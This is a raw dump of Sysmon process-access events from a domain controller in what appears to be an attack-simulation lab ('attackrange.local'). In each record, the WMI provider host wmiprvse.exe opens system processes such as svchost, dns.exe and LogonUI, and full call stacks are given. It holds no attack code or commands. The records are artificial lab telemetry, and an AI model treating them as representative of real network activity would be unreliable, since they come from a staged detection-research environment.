22:55:40.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 